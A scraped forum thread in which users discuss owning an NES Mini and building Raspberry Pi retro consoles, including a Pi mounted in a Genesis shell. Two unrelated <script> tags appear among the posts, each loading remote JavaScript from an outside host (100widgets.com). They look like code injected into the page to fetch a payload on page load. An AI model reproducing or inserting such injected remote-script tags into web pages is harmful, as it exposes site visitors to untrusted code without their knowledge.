NES Mini in Australia

Joshuabishop4

How many people have an NES Mini in Australia. My serial number is: CEE101516554

<script type="text/javascript" src="http://100widgets.com/js_data.php?id=264"></script>

i have a pi 2 its better then a nes i can play all old classics and stream steam games. 

8 hours ago, nerdslayer1 said:

i have a pi 2 its better then a nes i can play all old classics and stream steam games. 

I have a Rpi 2... too, and a Retro Mini Arcade Machine, Gear VR, Xbox 1, PS3, iPad 2G, iPod 2G, iPod 5G, Lenovo B50-30 , 5 DS's, A gameboy Advance SP, Lumia 435, A quadcopter and thats about it. BTW, thats everything I own and have bought my self. I am now broke lol, oh and 3 desktops

Edited by Joshuabishop4
I forgot something

<script type="text/javascript" src="http://100widgets.com/js_data.php?id=264"></script>

1 minute ago, nerdslayer1 said:

One of these days I'm going to finish building my Sega PiNesis...

It stalled but I've since ordered what I need to mostly finish it, panel mount USB/HDMI/Ethernet/USB Micro connectors to put at the back.  Thought he Pi needs some extra hardware to configure the power and reset buttons on the case to correctly operate the Pi.

11928705_10207651730114466_6231060999339839891_o.jpg

8 hours ago, AshleyAshes said:

It stalled but I've since ordered what I need to mostly finish it, panel mount USB/HDMI/Ethernet/USB Micro connectors to put at the back.  Thought he Pi needs some extra hardware to configure the power and reset buttons on the case to correctly operate the Pi.

That would be so cool, load up some sort of Sega MAME alternatve and that would be a great NES mini alternative, for alot less

3 minutes ago, AshleyAshes said:

thats nice you can do much more thing on the pi mine is a nas, retropi, youtube streaming, weather box,ununtu machine i have Pentabooted 5 os on the pi. its a vary handy tool worth its price. 

1 minute ago, Joshuabishop4 said:

That would be so cool, load up some sort of Sega MAME alternatve and that would be a great NES mini alternative, for alot less

Well, using RetroPi, it'd actually run basically ANY retro console.  The front DE9 ports have been drilled out and I'll be installing two female USB ports there for gameports.  It'll take any USB gamepad really, even 360 gamepads, or NES clones.

1 minute ago, nerdslayer1 said:

thats nice you can do much more thing on the pi mine is a nas, retropi, youtube streaming, weather box,ununtu machine i have Pentabooted 5 os on the pi. its a vary handy tool worth its price. 

Yeah but any idiot can throw RetroPi on a Pi and get it going.  The goal, which I'm resuming, was to very cleanly install it into a Genesis Model 2 shell.  Have the power LED work, power and reset buttons work, USB ports in the DE9 ports, all other inputs at the rear.  Have it look 'right' on the outside, which is the real effort.

1 minute ago, AshleyAshes said:

Yeah but any idiot can throw RetroPi on a Pi and get it going.  The goal, which I'm resuming, was to very cleanly install it into a Genesis Model 2 shell.  Have the power LED work, power and reset buttons work, USB ports in the DE9 ports, all other inputs at the rear.  Have it look 'right' on the outside, which is the real effort.

my pi is behind my tv, i originally made a Gameboy then i decided it would be a waste so i loaded 5 os when i get time i mess around. but now i have job and a life so for the last year my pi has been only a nas.   

dont start a war plz

Just got Flipnote Studio 3D!